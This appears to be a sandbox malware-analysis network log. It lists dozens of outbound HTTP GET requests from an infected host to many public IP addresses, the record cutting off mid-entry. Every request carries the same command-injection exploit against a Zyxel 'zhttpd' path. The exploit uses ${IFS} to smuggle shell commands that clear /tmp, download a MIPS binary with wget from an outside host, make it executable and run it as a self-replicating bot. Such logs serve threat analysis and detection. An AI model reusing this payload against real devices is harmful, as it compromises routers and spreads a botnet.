                                                  Jan 19, 2024 18:23:57.081691027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4702192.168.2.1355852142.86.139.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081722975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4703192.168.2.1337066154.169.10.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081773996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4704192.168.2.135234087.244.22.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081821918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4705192.168.2.135075677.132.100.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081872940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4706192.168.2.134183286.64.162.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081916094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4707192.168.2.1357076211.136.164.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081949949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4708192.168.2.1350798207.41.63.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081990004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4709192.168.2.1333442174.54.28.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082030058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4710192.168.2.1346412158.58.219.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082077026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4711192.168.2.1343566103.104.32.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082109928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4712192.168.2.135744442.182.158.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082138062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4713192.168.2.135824217.132.2.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082202911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4714192.168.2.13495781.199.234.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082242966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4715192.168.2.133915467.8.30.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082267046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4716192.168.2.1350450117.4.111.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082310915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4717192.168.2.1351040175.182.157.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082343102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4718192.168.2.133869681.188.11.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082371950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4719192.168.2.1357084195.196.15.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082422018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4720192.168.2.133662018.19.4.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082461119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4721192.168.2.133609691.35.102.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082479954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4722192.168.2.134192443.128.38.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082535982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4723192.168.2.1345118205.139.209.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082576036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4724192.168.2.1341180150.92.240.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082606077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4725192.168.2.136062614.216.126.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082650900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4726192.168.2.1335742129.91.185.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082684994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4727192.168.2.133852258.6.35.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082741022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4728192.168.2.134931249.2.225.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082770109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4729192.168.2.133532899.173.37.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082819939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4730192.168.2.135521817.119.145.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082854986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4731192.168.2.134316854.109.33.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082895041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4732192.168.2.1338174217.132.132.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082927942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4733192.168.2.134930291.152.7.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082961082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4734192.168.2.134011661.49.171.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.082989931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4735192.168.2.13507422.152.61.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083030939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4736192.168.2.1333864200.5.241.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083081007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4737192.168.2.1336426136.132.130.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083143950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4738192.168.2.136005041.176.19.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083175898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4739192.168.2.1343234136.118.212.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083209038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4740192.168.2.1344740158.167.133.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083234072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4741192.168.2.13538641.182.66.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083276033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4742192.168.2.1356524176.221.151.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083307028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4743192.168.2.1357102156.126.153.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083338976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4744192.168.2.1359898125.119.50.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083384991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4745192.168.2.1349572102.136.184.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083417892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4746192.168.2.1353370184.7.232.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083467960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4747192.168.2.133432657.29.67.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083522081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4748192.168.2.1359164205.15.92.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083549976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4749192.168.2.134703870.116.168.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083605051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4750192.168.2.135207635.124.5.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083632946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4751192.168.2.134732259.94.197.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083673954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4752192.168.2.13589002.177.222.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083723068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4753192.168.2.133977889.17.211.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083760977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4754192.168.2.1334206137.168.131.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083792925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4755192.168.2.1351292110.225.70.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083833933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4756192.168.2.1349494117.124.120.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083877087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4757192.168.2.1343468161.215.141.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083905935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4758192.168.2.1335338107.197.10.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.083964109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4759192.168.2.134759451.183.190.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084000111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4760192.168.2.1354264181.188.66.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084038019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4761192.168.2.135450689.44.56.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084075928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4762192.168.2.1352772100.155.232.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084131956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4763192.168.2.1334668155.217.245.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084148884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4764192.168.2.134582431.105.250.21443
                                                  TimestampBytes transferredDirectionData
